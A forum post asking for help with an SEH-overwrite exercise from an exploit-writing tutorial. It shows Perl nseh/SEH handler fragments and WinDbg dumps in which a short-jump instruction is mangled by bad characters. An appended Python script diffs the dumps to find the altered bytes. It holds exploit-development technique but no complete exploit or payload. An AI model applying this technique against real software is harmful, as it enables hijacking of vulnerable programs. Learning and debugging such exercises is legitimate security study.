I ran into a strange problem while working through Exploit writing tutorial 3b.
1. Before encoding nseh as a jump instruction (using \xcc to break here; everything in the debug output below looks normal):
my $nseh="\xcc\xcc\xcc\xcc"; #breakpoint, sploit should stop here
my $seh=pack('V',0x1002083D); # SEH handler address
0:000> d 0012fb7c
0012fb7c 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0012fb8c cc cc cc cc 3d 08 02 10-52 52 52 52 52 52 52 52 ....=...RRRRRRRR
0012fb9c 52 52 52 52 52 52 52 52-00 00 00 00 52 52 52 52 RRRRRRRR....RRRR
0012fbac cc cc cc cc cc cc cc cc-cc cc cc cc cc cc cc cc ................
0012fbbc cc cc cc cc cc cc cc cc-cc cc cc cc cc cc cc cc ................
0012fbcc cc cc cc cc cc cc cc cc-cc cc cc cc cc cc cc cc ................
0012fbdc cc cc cc cc cc cc cc cc-cc cc cc cc cc cc cc cc ................
0012fbec cc cc cc cc cc cc cc cc-cc cc cc cc cc cc cc cc ................
0:000> d eip
0012fb8c cc cc cc cc 3d 08 02 10-52 52 52 52 52 52 52 52 ....=...RRRRRRRR
0012fb9c 52 52 52 52 52 52 52 52-00 00 00 00 52 52 52 52 RRRRRRRR....RRRR
0012fbac cc cc cc cc cc cc cc cc-cc cc cc cc cc cc cc cc ................
0012fbbc cc cc cc cc cc cc cc cc-cc cc cc cc cc cc cc cc ................
0012fbcc cc cc cc cc cc cc cc cc-cc cc cc cc cc cc cc cc ................
0012fbdc cc cc cc cc cc cc cc cc-cc cc cc cc cc cc cc cc ................
0012fbec cc cc cc cc cc cc cc cc-cc cc cc cc cc cc cc cc ................
0012fbfc cc cc cc cc cc cc cc cc-cc cc cc cc cc cc cc cc ................
2. After encoding nseh as a jmp 30 bytes forward (this is where the problem shows up in the debug output):
my $nseh="\xeb\x1e\xcc\xcc"; #breakpoint, sploit should stop here
my $seh=pack('V',0x1002083D); # SEH handler address
0:000> d 0012fb7c
0012fb7c 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0012fb8c 3f cc cc 3d 08 02 10 52-52 52 52 52 52 52 52 52 ?..=...RRRRRRRRR
0012fb9c 52 52 52 52 52 52 52 52-00 00 00 00 52 52 52 cc RRRRRRRR....RRR.
0012fbac cc cc cc cc cc cc cc cc-cc cc cc cc cc cc cc cc ................
0012fbbc cc cc cc cc cc cc cc cc-cc cc cc cc cc cc cc cc ................
0012fbcc cc cc cc cc cc cc cc cc-cc cc cc cc cc cc cc cc ................
0012fbdc cc cc cc cc cc cc cc cc-cc cc cc cc cc cc cc cc ................
0012fbec cc cc cc cc cc cc cc cc-cc cc cc cc cc cc cc cc ................
0:000> d 0012fb8c
0012fb8c 3f cc cc 3d 08 02 10 52-52 52 52 52 52 52 52 52 ?..=...RRRRRRRRR
0012fb9c 52 52 52 52 52 52 52 52-00 00 00 00 52 52 52 cc RRRRRRRR....RRR.
0012fbac cc cc cc cc cc cc cc cc-cc cc cc cc cc cc cc cc ................
0012fbbc cc cc cc cc cc cc cc cc-cc cc cc cc cc cc cc cc ................
0012fbcc cc cc cc cc cc cc cc cc-cc cc cc cc cc cc cc cc ................
0012fbdc cc cc cc cc cc cc cc cc-cc cc cc cc cc cc cc cc ................
0012fbec cc cc cc cc cc cc cc cc-cc cc cc cc cc cc cc cc ................
0012fbfc cc cc cc cc cc cc cc cc-cc cc cc cc cc cc cc cc ................
After nseh was encoded as a jmp instruction, everything from 0012fb8c onward shifted forward by one byte as a whole, and the leading bytes were changed. As a result, when the exception occurs it can no longer jump to the pop/pop/ret in the dll. Later I tried the shellcode given in the tutorial and ran into the same problem.
Could someone more experienced please help?
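Added here as a worked example (not part of the original post): a small Python script that parses the WinDbg "d" dumps quoted above and aligns what the Perl script sent against what actually landed on the stack, so the one-byte shift and the input bytes that were altered can be identified mechanically rather than by eye. The sample dumps are constructed from the post's output; the 16-byte 'R' padding, NSEH_ADDR and SEH_HANDLER are assumptions read off those dumps.

```python
import difflib
import re
import struct
from typing import Dict, List, Set, Tuple

# Constructed sample input: the first three lines of each WinDbg "d" dump quoted in
# the post, before and after nseh was changed to "\xeb\x1e\xcc\xcc".
DUMP_BEFORE = """\
0012fb7c 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0012fb8c cc cc cc cc 3d 08 02 10-52 52 52 52 52 52 52 52 ....=...RRRRRRRR
0012fb9c 52 52 52 52 52 52 52 52-00 00 00 00 52 52 52 52 RRRRRRRR....RRRR
"""
DUMP_AFTER = """\
0012fb7c 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0012fb8c 3f cc cc 3d 08 02 10 52-52 52 52 52 52 52 52 52 ?..=...RRRRRRRRR
0012fb9c 52 52 52 52 52 52 52 52-00 00 00 00 52 52 52 cc RRRRRRRR....RRR.
"""
NSEH_ADDR = 0x0012FB8C    # stack address of nseh in the post's dumps (assumption)
SEH_HANDLER = 0x1002083D  # pop/pop/ret address the post uses as the SEH handler

# One "d" line: 8-hex-digit address, 16 hex bytes (spaces and one '-' between), ASCII column.
_LINE = re.compile(r'^\s*([0-9a-f]{8})\s+((?:[0-9a-f]{2}[ -]+){16})', re.I)

def parse_windbg_dump(text: str) -> Dict[int, int]:
    """Turn WinDbg 'd' output into an address -> byte-value map."""
    mem: Dict[int, int] = {}
    for line in text.splitlines():
        m = _LINE.match(line)
        if not m:
            continue  # skips prompt lines such as "0:000> d 0012fb7c"
        base = int(m.group(1), 16)
        for i, pair in enumerate(re.findall(r'[0-9a-f]{2}', m.group(2), re.I)):
            mem[base + i] = int(pair, 16)
    return mem

def read_bytes(mem: Dict[int, int], start: int, length: int) -> bytes:
    return bytes(mem[start + i] for i in range(length))

def expected_payload(nseh: bytes) -> bytes:
    """Bytes the script sends from the nseh position: nseh, seh (little-endian), 16 'R' bytes."""
    return nseh + struct.pack('<I', SEH_HANDLER) + b'R' * 16

def diff_bytes(expected: bytes, observed: bytes) -> List[Tuple[str, bytes, bytes]]:
    """Align what was sent against what reached the stack: (op, sent, seen) runs."""
    sm = difflib.SequenceMatcher(None, expected, observed, autojunk=False)
    return [(op, expected[i1:i2], observed[j1:j2]) for op, i1, i2, j1, j2 in sm.get_opcodes()]

def altered_input_bytes(expected: bytes, observed: bytes) -> Set[int]:
    """Input byte values that did not arrive intact (the values the target rewrote)."""
    return {b for op, sent, _ in diff_bytes(expected, observed) if op != 'equal' for b in sent}
```

Calling diff_bytes(expected_payload(b'\xeb\x1e\xcc\xcc'), read_bytes(parse_windbg_dump(DUMP_AFTER), NSEH_ADDR, 24)) yields a ('replace', eb 1e, 3f) run followed by a 22-byte 'equal' run, which is exactly the "two bytes became one, rest shifted by one" picture the post describes; altered_input_bytes() then names 0xeb and 0x1e as the values that did not survive.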